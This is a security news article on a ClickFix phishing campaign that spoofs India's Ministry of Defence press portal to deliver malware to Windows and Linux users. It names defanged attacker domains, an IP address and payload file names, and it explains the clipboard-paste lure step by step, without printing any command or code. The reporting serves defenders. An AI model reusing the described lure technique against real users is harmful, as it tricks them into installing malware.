ClickFix Attack Masquerades as Ministry of Defence Website to Target Windows & Linux Machines

A sophisticated phishing campaign has been uncovered wherein threat actors impersonate India’s Ministry of Defence to propagate malware across both Windows and Linux environments.

Leveraging a ClickFix-style delivery mechanism, the actors exploit recognizable government branding and web structures to lure unsuspecting users into executing malicious payloads.

The infrastructure, meticulously spoofed to mimic official Ministry press release archives, stages malware via compromised or abandoned .in domains, with a focus on deceiving users through visual and procedural authenticity.

Cross-Platform Social Engineering Campaign Imitates Indian Government Infrastructure

Initial reconnaissance by Hunt.io revealed that the malicious domain email.gov.in.drdosurvey[.]info was serving a duplicate of the Ministry of Defence’s press release portal.

This clone, closely mirroring the legitimate site’s layout, limited user interaction to a single, seemingly legitimate March 2025 press release link-all other months displayed inert “No Data” placeholders.

Technical analysis of the page’s source code indicated its construction using HTTrack, a widely available website duplication tool, with embedded metadata pointing to early March 2025 as the timeframe of the compromise.

Upon engaging with the active link, victims are funneled into a ClickFix social engineering path tailored by operating system.

For Windows users, the portal redirects to a /captcha/windows.php page presenting a full-screen “For Official Use Only” (FOUO) overlay with a blurred background image of the legitimate yoga.ayush.gov[.]in website.

A JavaScript function automatically copies a malicious mshta.exe command to the clipboard, instructing users to paste and execute it in their terminal.

This command retrieves an obfuscated .hta script (sysinte.hta) from the attacker-controlled trade4wealth[.]in infrastructure, which subsequently loads a .NET-based malware loader initiating outbound connections to 185.117.90[.]212 (linked to the email.gov.in.avtzyu[.]store subdomain).

During this sequence, the victim is shown a decoy PDF cloned from an authentic Ministry press release to sustain the illusion of legitimacy.

APT36 Suspected in Latest ClickFix Delivery Chain; Security Teams Urged to Monitor for Evolving Techniques

For Linux targets, the infection chain is less mature yet follows a similar template.

Victims are presented with a deliberately misspelled CAPTCHA prompt-“I’m not a rebot”-which, when clicked, silently copies a shell command to the clipboard.

Execution of this command downloads a shell script (mapeal.sh) from the same staging infrastructure, opens a benign JPEG image, but as of analysis, does not exhibit further malicious behavior or persistence mechanisms.

Detailed scrutiny of the campaign’s infrastructure reveals several tell-tale operator traits: use of typosquatted domains resembling Indian government properties, reliance on Namecheap for domain registration, deployment of HTA payloads in deep directory structures, and common spelling anomalies to evade pattern detection.

These tactics align with historic activity attributed to APT36 (Transparent Tribe), a Pakistan-aligned threat group renowned for targeting Indian governmental and military interests through similar delivery methods, including cloned portals, HTA scripting, and .NET-based malware.

This campaign underscores a trend of subtle refinement in threat actor tradecraft-combining credible visual lures, cross-platform execution via clipboard, and adaptive payload delivery to increase the success rate against targeted entities.

Security teams are advised to scrutinize for clipboard-based attack vectors, shallow site clones of trusted domains, and government-themed lure content staged under web asset directories, as these form the composite signature of this evolving threat landscape.

Indicators of Compromise (IOCs)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates